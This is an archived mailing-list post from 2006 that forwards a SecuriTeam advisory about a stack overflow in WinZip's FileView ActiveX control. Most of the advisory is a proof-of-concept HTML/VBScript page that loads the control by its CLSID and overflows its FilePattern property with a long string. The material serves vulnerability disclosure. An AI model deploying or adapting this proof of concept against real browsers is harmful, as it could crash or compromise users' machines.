Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

   


   


   

















      :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: [EXPL] WinZIP Stack Overflow POC (FileView ActiveX Control)



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Sunday, November 19, 2006 7:06 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [EXPL] WinZIP Stack Overflow POC (FileView ActiveX Control)
> 
> The following security advisory is sent to the securiteam 
> mailing list, and can be found at the SecuriTeam web site: 
> http://www.securiteam.com 
> 
> - - promotion
> 
> The SecuriTeam alerts list - Free, Accurate, Independent.
> 
> Get your security news from a reliable source.
> http://www.securiteam.com/mailinglist.html 
> 
> 
> - - - - - - - - -
> 
> 
> 
> WinZIP Stack Overflow POC (FileView ActiveX Control) 
> 
> 
> 
> "WinZip <http://www.winzip.com/>  is a windows data 
> compression utility that focuses on the Zip data compression 
> format for windows users." 
> 
> A stack overflow vulnerability exists in WinZIP's FileView 
> ActiveX control. 
> 
> 
> Vulnerable Systems: 
>  * WinZIP versions 10.0.7245 and prior. 
> 
> Exploit: 
> <!-- 
> WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability 
> -- prdelka 
> --> 
> 
> <HTML> 
> <HEAD> 
> <TITLE></TITLE> 
> </HEAD> 
> <BODY> 
>     <SCRIPT LANGUAGE="VBScript"> 
> <!-- 
> Sub WZFILEVIEW_OnAfterItemAdd(Item) 
> WZFILEVIEW.FilePattern = 
> 
> "STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV 
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW 
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB 
> ASEDOVERFLOWSTACKBASEDOVERFLOW" 
> end sub 
> --> 
>     </SCRIPT> 
>     <OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200 
>      CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904"> 
>     </OBJECT> 
> </BODY> 
> </HTML> 
> 
> 
> Additional Information: 
> The information has been provided by milw0rm 
> <http://www.milw0rm.com/> . 
> The original article can be found at: 
> http://www.milw0rm.com/exploits/2783 
> 
> 



 




Copyright © Lexa Software, 1996-2009.